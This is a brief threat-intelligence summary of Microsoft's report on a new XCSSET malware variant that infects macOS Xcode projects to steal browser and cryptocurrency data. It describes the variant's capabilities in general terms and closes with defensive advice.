Microsoft reports a new XCSSET malware variant targeting macOS, adding features like enhanced browser data theft, clipboard hijacking, and persistence. The malware primarily infects Xcode projects used by developers, enabling it to steal sensitive information and cryptocurrency data, with limited attacks observed so far. #XCSSET #macOS #malware #Xcode #cryptostealer
Keypoints
- The new XCSSET variant targets macOS devices and includes additional stealing capabilities for Firefox browser data.
- It uses modified tools like HackBrowserData to decrypt and export browser data from infected systems.
- The malware employs a clipboard hijacker to replace cryptocurrency addresses with attacker-controlled ones.
- New persistence methods include creating LaunchDaemon entries and fake system applications to hide activity.
- Microsoft advises updating macOS and inspecting Xcode projects carefully to prevent infection.